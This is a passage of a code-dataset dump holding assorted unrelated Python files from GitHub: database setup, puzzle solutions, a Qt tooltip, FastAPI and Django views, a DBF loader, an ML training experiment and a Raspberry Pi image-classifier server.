","repo_name":"pppineapple/LeetCode","sub_path":"Algorithms/环形链表II.py","file_name":"环形链表II.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33368213803","text":"from databases import Database\nfrom sqlalchemy import Column, Integer, MetaData, String, Table, create_engine\n\nDATABASE_URL = \"sqlite:///./fastapi.db\"\n\nengine = create_engine(DATABASE_URL)\n\nmetadata = MetaData()\n\n\nArticle = Table(\n    \"articles\",\n    metadata,\n    Column(\"id\", Integer, primary_key=True),\n    Column(\"title\", String(50), nullable=False, unique=True),\n    Column(\"description\", String(100), nullable=False),\n)\n\nUser = Table(\n    \"users\",\n    metadata,\n    Column(\"id\", Integer, primary_key=True),\n    Column(\"username\", String(50), nullable=False, unique=True),\n    Column(\"email\", String(50), nullable=False, unique=True),\n    Column(\"password\", String(500), nullable=False),\n)\n\n\ndatabase = Database(DATABASE_URL)\n","repo_name":"ivanlegranbizarro/asyncFastapi","sub_path":"database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15290849077","text":"'''\r\nProblem statement:\r\nhttps://www.hackerrank.com/challenges/alphabet-rangoli/problem\r\n'''\r\n\r\ndef print_rangoli(size):\r\n    # your code goes here\r\n    i = 97 + size -1\r\n    line = []\r\n    s= ''\r\n    while(i>=97):\r\n        temp = s.rjust((size-1)*2,'-')+chr(i)+\"\".join(reversed(s.rjust((size-1)*2,'-')))\r\n        line.append(temp);\r\n        s += chr(i)+'-'\r\n        i -= 1\r\n\r\n    for l in range(0,len(line)):\r\n        print(line[l])\r\n    length = len(line)-2\r\n    while(length>=0):\r\n        print(line[length])\r\n        length -= 1\r\n    \r\n\r\nif __name__ == '__main__':\r\n    n = int(input())\r\n    
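    # Added illustration (not in the original submission): for n = 2 the
    # program prints the three-line rangoli
    #     --b--
    #     b-a-b
    #     --b--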
print_rangoli(n)","repo_name":"jaikishanEngg/HackerRank_Python_Practice","sub_path":"Strings_AlphabetRangoli.py","file_name":"Strings_AlphabetRangoli.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39588639744","text":"def print_grid(arr): \r\n t=len(grid)\r\n for i in range(0,t):\r\n m=grid[0]\r\n del grid[0]\r\n for i in m:\r\n print(i,end=\"\")\r\n print('\\t')\r\n\r\n\t\t\r\ndef find_empty_location(arr,l): \r\n\tfor row in range(9): \r\n\t\tfor col in range(9): \r\n\t\t\tif(arr[row][col]==0): \r\n\t\t\t\tl[0]=row \r\n\t\t\t\tl[1]=col \r\n\t\t\t\treturn True\r\n\treturn False\r\ndef used_in_row(arr,row,num): \r\n\tfor i in range(9): \r\n\t\tif(arr[row][i] == num): \r\n\t\t\treturn True\r\n\treturn False\r\n\r\ndef used_in_col(arr,col,num): \r\n\tfor i in range(9): \r\n\t\tif(arr[i][col] == num): \r\n\t\t\treturn True\r\n\treturn False\r\ndef used_in_box(arr,row,col,num): \r\n\tfor i in range(3): \r\n\t\tfor j in range(3): \r\n\t\t\tif(arr[i+row][j+col] == num): \r\n\t\t\t\treturn True\r\n\treturn False\r\ndef check_location_is_safe(arr,row,col,num): \r\n\treturn not used_in_row(arr,row,num) and not used_in_col(arr,col,num) and not used_in_box(arr,row - row%3,col - col%3,num) \r\n\r\ndef solve_sudoku(arr): \r\n\tl=[0,0] \r\n\tif(not find_empty_location(arr,l)): \r\n\t\treturn True\r\n\trow=l[0] \r\n\tcol=l[1] \r\n\tfor num in range(1,10): \r\n\t\tif(check_location_is_safe(arr,row,col,num)): \r\n\t\t\tarr[row][col]=num\r\n\t\t\tif(solve_sudoku(arr)): \r\n\t\t\t\treturn True\r\n\t\t\tarr[row][col] = 0\r\n\treturn False\r\n\r\ngrid=[]\r\nt=9\r\nwhile(t>0):\r\n t=t-1\r\n l=input()\r\n l=list(l)\r\n l=[int(l[i]) for i in range(0,len(l))]\r\n grid.append(l)\r\nif(solve_sudoku(grid)): \r\n print_grid(grid) \r\n","repo_name":"Manthanc007/APS-2o2o","sub_path":"Projecteuler1.py","file_name":"Projecteuler1.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9229377834","text":"# tooltip.py: -*- Python -*- DESCRIPTIVE TEXT.\n\nfrom qt import *\nfrom util import *\n\nclass Tooltip(QLabel):\n def __init__(self, text, bgcolor=\"#ffd700\",fgcolor=\"#000000\",delay=1000):\n self.delay = delay\n QLabel.__init__(self, None, \"tooltip\", Qt.WStyle_StaysOnTop\n | Qt.WStyle_Customize\n | Qt.WStyle_NoBorder\n | Qt.WStyle_Tool)\n self.setMargin(1)\n self.setIndent(0)\n self.setAutoMask(FALSE)\n self.setFrameStyle(QFrame.Plain | QFrame.Box)\n self.setLineWidth(1)\n self.polish()\n self.setText(text)\n self.adjustSize()\n\n # set the pallete...\n pal = QPalette()\n cg = QColorGroup()\n cg.setColor(QColorGroup.Background, QColor(bgcolor))\n cg.setColor(QColorGroup.Foreground, QColor(fgcolor))\n pal.setActive(cg)\n pal.setInactive(cg)\n self.setPalette(pal)\n\n self.enter_timer_id = None\n self.leave_timer_id = None\n\n\n def set_tooltip(self, text):\n self.text = text\n self.setText(text)\n\n\n def clear_tooltip(self):\n self.text = ''\n self.setText('')\n \n\n def addWidget(self, widget):\n #print \"adding widget\", widget\n widget.installEventFilter(self)\n\n\n def removeWidget(self, widget):\n #print \"removing widget\", widget\n widget.removeEventFilter(self)\n\n\n def killCustomTimers( self ):\n if self.enter_timer_id:\n self.killTimer( self.enter_timer_id )\n self.enter_timer_id = None\n if self.leave_timer_id:\n self.killTimer( self.leave_timer_id )\n self.leave_timer_id = None\n\n\n def timerEvent( 
self, ev ):\n if ev.timerId() == self.enter_timer_id:\n self.tooltip_open()\n elif ev.timerId() == self.leave_timer_id:\n self.tooltip_close()\n self.killCustomTimers()\n\n\n def eventFilter(self, obj, ev):\n type = ev.type()\n #print obj, type\n if type == QEvent.Enter:\n self.killCustomTimers()\n self.enter_timer_id = self.startTimer(self.delay)\n #print \"tip!\"\n self.event_widget = obj\n elif type == QEvent.Leave:\n self.killCustomTimers()\n self.leave_timer_id = self.startTimer(self.delay)\n #print \"remove tip!\"\n self.event_widget = None\n return FALSE ## Always return unhandled for this kind of filter!!!\n\n\n def tooltip_open(self):\n if not self.text:\n return\n \n try:\n pos = self.event_widget.mapToGlobal(\n QPoint(0, self.event_widget.height()))\n self.move(pos.x(), pos.y())\n self.show()\n self.setFixedSize( self.sizeHint() )\n except:\n pass\n\n\n def tooltip_close(self):\n self.hide()\n","repo_name":"multani/kodos-qt3","sub_path":"modules/tooltip.py","file_name":"tooltip.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15359618839","text":"from typing import Any\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom httpx import AsyncClient\n\nfrom app import models, schemas\nfrom app.api import deps\nfrom app.core.config import settings\n\nrouter = APIRouter()\n\n\n@router.get(\n \"/\",\n response_model=schemas.CashBack,\n status_code=status.HTTP_200_OK,\n responses=deps.GET_TOKEN_USER_RESPONSES\n | {503: {\"model\": schemas.HTTPError}},\n)\nasync def get_cashback(\n async_client: AsyncClient = Depends(deps.get_async_client),\n token_user: models.User = Depends(deps.get_token_user),\n) -> Any:\n # get user purchases\n user_purchases = token_user.purchases_\n\n # sum internal cashback\n accumulated_cashback = 0\n for purchase in user_purchases:\n accumulated_cashback += float(purchase.cashback_value)\n\n # get cashback of external service\n url = f\"{settings.EXTERNAL_CASHBACK_API}?cpf={token_user.cpf}\"\n resp = await async_client.get(url)\n\n external_cashback = resp.json().get(\"cashback\")\n\n # if external service is unavailable return 503\n if resp.status_code != 200 or not external_cashback:\n raise HTTPException(\n status_code=status.HTTP_503_SERVICE_UNAVAILABLE,\n detail=(\n \"The service is currently unavailable, please try again later.\"\n ),\n )\n\n accumulated_cashback += external_cashback\n\n return schemas.CashBack(cashback=accumulated_cashback)\n","repo_name":"wlsouza/cashbackgb","sub_path":"app/api/api_v1/endpoints/cashback.py","file_name":"cashback.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12534346894","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom tools.models import Tool,UserProfile,Rent,RentRequest\n\n\"\"\"\n\tdetail(request, tool_id)\n\tView handler for tool detail page\n\"\"\"\ndef detail(request, tool_id):\n delete = None\n user = None\n rent = None\n if request.user.is_authenticated():\n tool = Tool.objects.filter(pk=tool_id)\n user_profile = UserProfile.objects.get(user=request.user)\n if len(tool) == 0:\n return HttpResponseRedirect(reverse('tools:tools'))\n else:\n tool = Tool.objects.get(pk=tool_id)\n if tool.owner.community == user_profile.community:\n request_list = RentRequest.objects.filter()\n tool_request_list 
= RentRequest.objects.filter(tool_requested = tool, req_status = 0)\n myrequest = RentRequest.objects.filter(requester = user_profile, tool_requested = tool, req_status = 0)\n if (tool.rentable == 0): \n checkrent = Rent.objects.filter(tool_rented = tool, returned = 0)\n if len(checkrent) != 0:\n rent = Rent.objects.get(tool_rented = tool, returned = 0)\n context = {'myrequest':myrequest, 'tool': tool, 'rent': rent, 'user': user_profile, 'request_list' : request_list, 'tool_request_list' : tool_request_list}\n return render(request, 'tools/detail.html', context)\n else:\n return HttpResponseRedirect(reverse('tools:tools'))\n return HttpResponseRedirect(reverse('tools:login'))","repo_name":"mbd9441/ToolShare","sub_path":"tools/views/detail_controller.py","file_name":"detail_controller.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2804918176","text":"#!/usr/bin/env python3\nimport io, sys, json, subprocess, os, re, pprint\n\npp = pprint.PrettyPrinter(indent=4).pprint\nSA_CMD = \"sa --separate-times --sort-real-time --user-summary\"\nSA_COLS = [\n\t{\"name\": \"quantity\",\"suffix\":\"None\"},\n\t{\"name\": \"elapsed_time_minutes\",\"suffix\":\"re\"},\n\t{\"name\": \"user_cputime_seconds\",\"suffix\":\"u\"},\n\t{\"name\": \"user_cputime_seconds\",\"suffix\":\"s\"},\n\t{\"name\": \"average_iops\",\"suffix\":\"avio\"},\n\t{\"name\": \"memory_kilobytes\",\"suffix\":\"k\"},\n]\n\n\ndef getStats():\n proc = subprocess.Popen(SA_CMD.split(' '), stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=False,env=os.environ.copy())\n stdout, stderr = proc.communicate()\n exit_code = proc.wait()\n\n stdout = stdout.decode().strip().splitlines()\n Stats = {}\n R = []\n def addUserStat(stats):\n if len(stats) == len(SA_COLS):\n stats = ['_TOTALS',*stats]\n username = stats[0]\n Stats[username] = {}\n for index, stat in enumerate(stats):\n SA_COL = SA_COLS[index-1]\n if SA_COL['suffix'] and stat.endswith(SA_COL['suffix']):\n stat = re.sub(\"{}$\".format(SA_COL['suffix']),'',stat)\n Stats[username][SA_COL['name']] = stat\n\n return Stats #[username][SA_COL['name']]\n \n for index, line in enumerate(stdout):\n line = [l for l in line.split(' ') if len(l)>0]\n USER_STAT = addUserStat(line)\n R.append(USER_STAT)\n return R\n\nif __name__ == \"__main__\":\n print(json.dumps(getStats()))\n sys.exit(0)\n","repo_name":"binRick/python-parse-process-accounting","sub_path":"parse_process_accounting/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21817891976","text":"from sqlalchemy import create_engine\nfrom dbfread import DBF\nimport json,urllib,math,pyodbc,pandas as pd\nfrom datetime import datetime\n\n#Se establece la coneccion a la base de datos.\ndef conection():\n\n ConnetionDB = 'Connectionlocal'\n\n with open('DBconfig.json') as conn:\n\n config = json.loads(conn.read())\n database_name = config[ConnetionDB][\"DB_NAME\"]\n database_user = config[ConnetionDB][\"DB_USER\"]\n database_password = config[ConnetionDB][\"DB_PASSWORD\"]\n database_server = config[ConnetionDB][\"SERVER\"]\n dbms_driver = config[ConnetionDB][\"DRIVER\"]\n\n ConnectionString = \"DRIVER={0};SERVER={1};DATABASE={2};UID={3};PWD={4}\".format(dbms_driver, database_server, database_name, database_user, database_password)\n try: \n \n quoted = urllib.parse.quote_plus(ConnectionString)\n engine = 
create_engine('mssql+pyodbc:///?odbc_connect={}'.format(quoted))\n return engine\n\n except Exception as e:\n print(\"Error connecting to database \" + str(e)) \n\n\ndef load_json():\n\n with open('config.json') as conn:\n \n config = json.loads(conn.read())\n\n return config\n\n\ndef load_to_sqlserver(conn,df_data,name_table,sucursal,schema):\n\n df_data['sucursal']= sucursal\n \n df_num_of_cols = len(df_data.columns)\n \n chunknum = math.floor(2100/df_num_of_cols)\n \n df_data.to_sql(name_table,con=conn,index=False,schema=schema,if_exists='append', chunksize=chunknum,method='multi')\n\n\n\n \ndef main():\n conn = conection()\n\n loaded_json = load_json()\n\n for num,config in enumerate(loaded_json):\n\n dbf_frame = pd.DataFrame(DBF(config[\"url\"]),columns = config[\"get_columns\"])\n\n dbf_frame_filtered = dbf_frame[dbf_frame[config[\"condition_columns\"]] > datetime.strptime(config[\"condition_value\"],'%Y-%m-%d').date()].fillna(0).astype(str)\n \n if dbf_frame_filtered.empty != True:\n\n load_to_sqlserver(conn,dbf_frame_filtered,config[\"sink\"],config[\"sucursal\"],config[\"schema\"])\n\n loaded_json[num][\"condition_value\"] = str(dbf_frame_filtered[config[\"condition_columns\"]].max())\n\n json.dump(loaded_json, open(\"config.json\", \"w\"), indent = 4)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"AlexanderRosario/Load_increase","sub_path":"incremental.py","file_name":"incremental.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11361194684","text":"import importlib.resources as pkg_resources\nimport json\nimport logging\nimport math\nimport os\nimport random\nfrom collections import OrderedDict\nfrom datetime import datetime\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as _default_module_optim\nfrom pandas import DataFrame\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader\n\nfrom .config import update_config, init_obj\nfrom .dataset import ScientificPaperDataset\nfrom .modules import SentenceClassifier\nfrom .trainer import Trainer\n\nMAX_INT = 4294967296\n\nlogger = logging.getLogger(__name__)\n\n\nclass Experiment(object):\n \"\"\"\n The ``Experiment`` class helps to perform experiments with sentence classification models.\n It reads the configuration file, initializes components\n (data loaders, model, optimizer, criterion, metric, trainer),\n provides methods to perform training and evaluation.\n \"\"\"\n\n def __init__(\n self,\n config: Dict = None,\n data: DataFrame = None,\n resume: str = None,\n model=None,\n trainer=None,\n criterion=None,\n metric=None,\n optimizer=None,\n device=None,\n default_config_file: str = 'default_config.json'\n ):\n super().__init__()\n\n # Configuration\n if not resume:\n with pkg_resources.open_text(__package__, default_config_file) as text:\n default_config = json.load(text, object_hook=OrderedDict)\n if config is None:\n config = default_config\n else:\n config = update_config(default_config, config)\n self.config = config\n else:\n with open(os.path.join(resume, 'config.json'), 'r') as f:\n config = json.load(f, object_hook=OrderedDict)\n self.config = config\n\n # Logger\n self.default_logger(**config['logger'])\n\n # Random seeds\n self.set_random_seeds()\n\n # Device\n if device is None:\n device = self.default_device()\n logger.info(f'Use device: {device}')\n self.device = device\n\n # Paths\n self.set_paths()\n\n # 
Data, datasets, data loaders\n self.data = data\n self.train_data, self.dev_data, self.test_data = self.split_data(config['data'])\n\n config['dataset']['labels'] = list(self.data['label'].cat.categories)\n\n self.train_dataset = ScientificPaperDataset(self.train_data.copy())\n self.dev_dataset = ScientificPaperDataset(self.dev_data.copy())\n self.test_dataset = ScientificPaperDataset(self.test_data.copy())\n\n self.train_data_loader = DataLoader(self.train_dataset,\n batch_size=config['data_loaders']['train_batch_size'],\n shuffle=True)\n self.dev_data_loader = DataLoader(self.dev_dataset,\n batch_size=config['data_loaders']['dev_batch_size'],\n shuffle=False)\n self.test_data_loader = DataLoader(self.test_dataset,\n batch_size=config['data_loaders']['test_batch_size'],\n shuffle=False)\n\n # Model\n if model is None:\n model = self.default_model(config['model'])\n self.model = model\n\n # Optimizer, criterion, metrics, trainer...\n if optimizer is None:\n optimizer = self.default_optimizer(config['optimizer'])\n self.optimizer = optimizer\n\n if criterion is None:\n criterion = self.default_criterion()\n self.criterion = criterion\n\n if metric is None:\n metric = config['metric']\n self.metric = metric\n\n if trainer is None:\n trainer = self.default_trainer()\n self.trainer = trainer\n\n if resume:\n self.resume(resume)\n\n def set_random_seeds(self):\n seeds_config = self.config['seeds']\n if seeds_config['py_seed'] is None:\n seeds_config['py_seed'] = random.randint(0, MAX_INT)\n if seeds_config['np_seed'] is None:\n seeds_config['np_seed'] = random.randint(0, MAX_INT)\n if seeds_config['torch_seed'] is None:\n seeds_config['torch_seed'] = random.randint(0, MAX_INT)\n random.seed(seeds_config['py_seed'])\n np.random.seed(seeds_config['np_seed'])\n torch.manual_seed(seeds_config['torch_seed'])\n logger.info(f\"Python random seed: {seeds_config['py_seed']}\")\n logger.info(f\"NumPy random seed: {seeds_config['np_seed']}\")\n logger.info(f\"Torch random seed: {seeds_config['torch_seed']}\")\n\n def set_paths(self):\n paths_config = self.config['paths']\n output_dir = paths_config['output_dir']\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n logger.info(f'Create output directory: {output_dir}')\n\n if 'experiment_dir' not in paths_config:\n current_time = datetime.now().strftime('%y%m%d_%H-%M-%S')\n if self.config['dataset']['name'] is not None:\n experiment_name = '{}_{}'.format(self.config['dataset']['name'], current_time)\n else:\n experiment_name = current_time\n experiment_dir = os.path.join(output_dir, experiment_name)\n if not os.path.exists(experiment_dir):\n os.mkdir(experiment_dir)\n logger.info(f'Create experiment directory: {experiment_dir}')\n log_dir = os.path.join(experiment_dir, 'log')\n\n paths_config['experiment_dir'] = experiment_dir\n paths_config['log_dir'] = log_dir\n\n def default_logger(self, **kwargs):\n logging.basicConfig(format=kwargs['format'], level=kwargs['level'])\n\n def default_device(self):\n return torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n def split_data(self, config):\n size = len(self.data)\n dev_size = config['dev_ratio'] if isinstance(config['dev_ratio'], int) \\\n else math.ceil(config['dev_ratio'] * size)\n test_size = config['test_ratio'] if isinstance(config['test_ratio'], int) \\\n else math.ceil(config['test_ratio'] * size)\n rs1, rs2 = config['random_states']\n if rs1 is None:\n rs1 = random.randint(0, MAX_INT)\n if rs2 is None:\n rs2 = random.randint(0, MAX_INT)\n config['random_states'] = [rs1, rs2]\n 
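        # Added note (not in the original): the split is two-stage and
        # stratified on 'label': first carve out the test set, then carve the
        # dev set from the remainder, so class proportions survive both cuts.
        # E.g. 1000 rows with dev/test ratios of 0.1 give test=100, dev=100,
        # train=800.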
train_dev_data, test_data = train_test_split(\n self.data,\n test_size=test_size, shuffle=True, stratify=self.data['label'],\n random_state=rs1,\n )\n train_data, dev_data = train_test_split(\n train_dev_data,\n test_size=dev_size, shuffle=True, stratify=train_dev_data['label'],\n random_state=rs2,\n )\n return train_data, dev_data, test_data\n\n def default_model(self, config):\n config['output_dim'] = self.data['label'].nunique()\n model = SentenceClassifier(**config)\n model.to(self.device)\n return model\n\n def default_optimizer(self, config):\n params = [{'params': self.model.sentence_embedder.parameters()},\n {'params': self.model.projection_layer.parameters(), 'lr': config['learning_rate_top']}]\n return init_obj(config['type'], _default_module_optim, params, lr=config['learning_rate'])\n\n def default_criterion(self):\n labels = self.data['label'].cat.codes\n label_counts = np.bincount(labels)\n label_weights = len(labels) / (len(label_counts) * label_counts)\n label_weights = torch.tensor(label_weights, dtype=torch.float, device=self.device)\n criterion = nn.CrossEntropyLoss(weight=label_weights)\n return criterion\n\n def default_trainer(self):\n return Trainer(\n model=self.model,\n optimizer=self.optimizer,\n criterion=self.criterion,\n metric=self.metric,\n config=self.config,\n device=self.device,\n )\n\n def resume(self, path):\n logger.info('Load checkpoint from: {}'.format(path))\n self.trainer.load_checkpoint(path)\n\n def train(self):\n self.trainer.train(\n self.train_data_loader,\n self.dev_data_loader,\n **self.config['trainer'],\n )\n\n def eval(self):\n self.trainer.eval(\n self.dev_data_loader,\n verbose=self.config['trainer']['verbose'],\n )\n\n def test(self):\n self.trainer.eval(\n self.test_data_loader,\n verbose=self.config['trainer']['verbose'],\n )\n","repo_name":"bichngocdo/sentence-classification","sub_path":"sentclf/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35735126148","text":"N, M, A, B = map(int, input().split())\n\nbool = [False] * N\n\nfor _ in range(M):\n a, b = map(int, input().split())\n for i in range(a-1, b):\n if not bool[i]:\n bool[i] = not bool[i]\n\na = bool.count(True)\n\nprint(a*A+(N-a)*B)","repo_name":"haytok/AtCoder","sub_path":"Company/2018/CODEFESTIVAL2018/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45224262366","text":"import glob\nimport os\nimport tensorflow as tf\nimport numpy as np\nfrom xmlrpc.server import SimpleXMLRPCServer\nimport time\nimport io\nimport socket\nimport struct\nfrom PIL import Image\nimport base64\nimport traceback\nfrom time import sleep\nimport netifaces as ni\nni.ifaddresses('wlan0')\nip = ni.ifaddresses('wlan0')[2][0]['addr']\n#print(\"listening at \"+ip.strip()+\":8000\")\nsess= tf.Session()\nlabel_lines = []\nsoftmax_tensor = None\nserver = SimpleXMLRPCServer(('192.168.43.12', 9009),allow_none=True)\n\n# Start a socket listening for connections on 0.0.0.0:8000 (0.0.0.0 means\n# all interfaces)\ndef load_ai_server():\n #print(\"load_ai_server ....\")\n load_start_time = time.time()\n server_socket = socket.socket()\n server_socket.bind(('192.168.43.12', 8000))\n server_socket.listen(0)\n #print(\"load_ai_server done\")\n # socket connection live at ....1.4 @ port 8000\n # accept socket connection and listen to pakcet daata\n 
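    # Added note (not in the original script): accept() returns (socket, addr);
    # makefile('rb') wraps the socket in a buffered binary file object, so the
    # 4-byte length header and the JPEG payload can both be read with .read().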
# Accept a single connection and make a file-like object out of it\n    connection = server_socket.accept()[0].makefile('rb')\n    imageList = []\n    try:\n        while True:\n            #print(\"waiting for hit from picamclient....\")\n            # Read the length of the image as a 32-bit unsigned int. If the\n            # length is zero, quit the loop\n            image_len = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]\n            if not image_len:\n                print(\"total time >> \",str(( time.time() - load_start_time)))\n                del imageList[:]\n                #print(\"after processing list size>>> \",len(imageList))\n                break\n            # Construct a stream to hold the image data and read the image\n            # data from the connection\n            image_stream = io.BytesIO()\n            image_stream.write(connection.read(image_len))\n            # image_path.write(connection.read(image_len))\n            # Rewind the stream, open it as an image with PIL and do some\n            # processing on it\n            image_stream.seek(0)\n            image = Image.open(image_stream)\n            imageList.append(image)\n            \n    except Exception as e:\n    \tprint(\"Exception >> \",e)\n    finally:\n        connection.close()\n        server_socket.close()\ndef close_stream_server():\n    connection.close()\n    server_socket.close()\n\ndef load_ai_engine():# MAJOR PERFORMANCE BOOST- does persist tf session so that session is not loaded on-demand\n\tprint(\"loading AI engine...\")\n\tglobal label_lines\n\tlabel_lines = [line.rstrip() for line in tf.gfile.GFile(\"/home/airig/python-scripts/birdfeeder/labels.txt\")]\n\twith tf.gfile.FastGFile(\"/home/airig/python-scripts/birdfeeder/retrained_graph_birdfeeder.pb\", 'rb') as f:#retrain_lastlayer/output_graph.pb\n\t    graph_def = tf.GraphDef()\n\t    graph_def.ParseFromString(f.read())\n\t    _ = tf.import_graph_def(graph_def, name='')\n\tglobal sess\n\tsess = tf.Session()  # keep the session open; the original 'with' block closed it before any inference could run\n\tglobal softmax_tensor\n\tsoftmax_tensor = sess.graph.get_tensor_by_name('final_result:0')\n\tprint(\"AI engine loaded\")\n\t#return sess,label_lines,softmax_tensor\ndef process_ai_engine(imageList):#(sess,label_lines,softmax_tensor):\n\tprint('Inside AI Engine....READING Image>>>>> ')\n\tstart_time = time.time()\n\tdetected_obj_list=[]\n\tfor image in imageList:\n\t\ttry:\n\t\t\timage_array = np.array(image)[:,:,0:3]\n\t\t\tpredictions = sess.run(softmax_tensor, {'DecodeJpeg:0': image_array})\n\t\texcept Exception:\n\t\t\tprint(\"error in running tf session >> \", str(traceback.print_exc()))\n\t\ttop_k = predictions[0].argsort()[-len(predictions[0]):][::-1]\n\t\thuman_string = label_lines[top_k[0]]\n\t\tscore = predictions[0][top_k[0]]\n\t\tif(score>0.5):# 50% accuracy is VERY LENIENT!! this value needs to be adjusted as per trained model accuracy\n\t\t\tdetected_obj_list.append(human_string)\n\t\telse:\n\t\t\tpass#print(\"score less than 0.5 for\",human_string)\n\ttry:\n\t\thuman_string = max(set(detected_obj_list), key=detected_obj_list.count)\n\texcept Exception as e:\n\t\thuman_string= \"UNKNOWN\"\n\t\t#confidence= \"UNKNOWN\"\n\t\tprint(\"Not sure. Retry.\")\n\treturn human_string#\"Outcome >> \"+human_string+\">>(INFERENCE TIME:)\"+str(( time.time() - start_time))#+\">>(Confidence:)\"+str(score*100)+\n\t\ntry:\n\t#print(\"with try\")\n\tserver.register_function( load_ai_engine )\n\tserver.register_function( load_ai_server )\n\tserver.register_introspection_functions()\n\tprint(\"listening at \"+ip+\":9009 ................. \")\r\n
\")\n\tserver.serve_forever()\nexcept(Exception,KeyboardInterrupt, SystemExit) as e:\n\tprint(\"\\nGPU module shutdown successfuly\\n\",str(e))\n\n","repo_name":"anuj2rock/fair-fed","sub_path":"classifier_server.py","file_name":"classifier_server.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42826003715","text":"\nrow1 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nrow2 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nrow3 = [\"⬜️\",\"⬜️\",\"⬜️\"]\nmap = [row1, row2, row3]\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure?\\nEnter Row then coloumn: \")\n\n\n\n\n# print(type(position)) users input is in str need to change to int\n\nhori = position[0] \nvert = position[1] \nhori_int = int(hori) - 1\nvert_int = int(vert) - 1\n\nmap[hori_int][vert_int] =\"X\"\n\n\n\n\n\n\nprint(f\"{row1}\\n{row2}\\n{row3}\")","repo_name":"MusarrafAM/Python-beginner-programs","sub_path":"10. Treassure map(X).py","file_name":"10. Treassure map(X).py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17784045990","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Task: 문서를 보고 category2를 예측\n\n# **학습 데이터에 대한 통계정보 시각화**\n\n# # **전체를 한번에 보고 바로 소분류 예측**\n\n# In[2]:\n\n\nget_ipython().system('pip install transformers')\nget_ipython().system('pip install pandas')\nget_ipython().system('pip install numpy')\nget_ipython().system('pip install tqdm')\nget_ipython().system('pip install scikit-learn')\n\n\n# In[3]:\n\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport random\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn.functional as F\nfrom sklearn.model_selection import train_test_split\nfrom transformers import TrainingArguments, Trainer\nfrom transformers import AutoModelForSequenceClassification, AutoTokenizer\n\nfrom transformers import BertTokenizer\n\nfrom sklearn.metrics import precision_recall_fscore_support\n\n\n# In[4]:\n\n\ndef seed_everything(seed:int = 1004):\n random.seed(seed)\n np.random.seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed) # type: ignore\n torch.backends.cudnn.deterministic = True # type: ignore\n torch.backends.cudnn.benchmark = True # type: ignore\n\nseed_everything(42)\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nprint(device)\n\n\n# In[5]:\n\n\ntrain_path = \"train.csv\"\ntest_path = \"test.csv\"\nsubmission_path = \"\"\n\n\n# In[6]:\n\n\ndf = pd.read_csv(train_path, encoding='utf-8')\n\nfor cate1 in df['category1'].unique():\n condition = df['category1'] == cate1\n words = set()\n tokenized_words = set()\n# print(condition)\n# for sent in df[condition]['text'].values:\n# tokenized_words.update(word_tokenize(sent)) \n# words.update(sent.split(\" \"))\n# print(f\"{cate1}의 토크나이즈 전: {len(words)} -> 토크나이즈 후: {len(tokenized_words)}\")\n\nlabels_dictionary = {k: v for k,v in zip(df['category2'].unique(), range(0,len(df['category2'].unique())))}\nlabels_dictionary_reverse = {v: k for k,v in zip(df['category2'].unique(), range(0,len(df['category2'].unique())))}\n\n\n# # DistilBERT\n# - DistilBERT is a transformers model, smaller and faster than BERT, which was pretrained on the same corpus in a self-supervised fashion, using the BERT base model as a teacher.\n# - BERT 시도 후, DistilBERT 모델로 성능 향상 후 최종 제출하였음.\n# \n# # 참고자료 출처\n# - 
